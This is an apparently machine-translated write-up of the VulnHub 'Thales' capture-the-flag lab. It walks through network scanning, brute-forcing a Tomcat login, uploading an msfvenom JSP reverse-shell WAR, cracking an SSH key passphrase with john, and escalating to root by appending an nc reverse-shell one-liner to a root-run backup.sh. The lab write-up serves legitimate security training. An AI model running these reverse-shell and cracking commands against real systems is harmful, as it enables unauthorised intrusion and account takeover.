Catalog

Preface

describe

One 、 information gathering

0x00 arp-scan scanning

0x01 nmap scanning

Two 、 Exploit

0x00 msfconsole utilize

0x01 Upload files

3、 ... and 、 Elevated privileges

0x00 rebound shell

0x02 Dictionary explosion ​ edit

0x03 user.txt

0x04 rebound shell

0x05 root.txt

summary

Preface

describe

brief introduction ： Open your eyes , Another angle

Include 2 A sign ：user.txt and root.txt.

Download link

https://download.vulnhub.com/thales/Thales.zip.torrent

0x00 Introduction to the environment 
kali  192.168.56.102
Thales Drone aircraft   192.168.56.101

One 、 information gathering

0x00 arp-scan scanning

arp-scan -I eth1 -l
# Scan network card LAN 

0x01 nmap scanning

 Scan to two network segments 
 Not sure which 
nmap  Scan scan two IP

 Open ports 22 and 8080

Visit Site , User name and password are required

Two 、 Exploit

0x00 msfconsole utilize

msf Search for tomcat login

 To configure payload

 user name    tomcat
​
 password      role1

 Login successfully 

0x01 Upload files

Look for function points , Found the upload point

 utilize kali Generate war File Trojan do rebound shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555  -f war -o myshell.war

Upload successful , And run

3、 ... and 、 Elevated privileges

0x00 rebound shell

Listening port

 Upgrade transaction mutual shell

sudo -l  # Need a password , Unknown 
 stay home User found under file Thales

 stay `notes.txt` Found in the file `/usr/local/bin/backup.sh
 View file contents 

0x02 Dictionary explosion

Find out .ssh Folder

It is found that the private key can be used ssh2john.py Generate password file explosion

use ssh2john.py Compile the script

/usr/share/john/ssh2john.py id_rsa > crack.txt

 john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Burst out the code vodka06

Switching users

0x03 user.txt

see user.txt--- first flag

notes.txt yes root The powers of the , There may be something inside

0x04 rebound shell

notice backup.sh It has executive authority , Can write bounce shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh

File content editing will directly replace , Append for selection

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh

0x05 root.txt

monitor 9999, After writing, you will connect by yourself

summary

Thales Learned

msf The use of blasting dictionary

rsa Use of private key ciphertext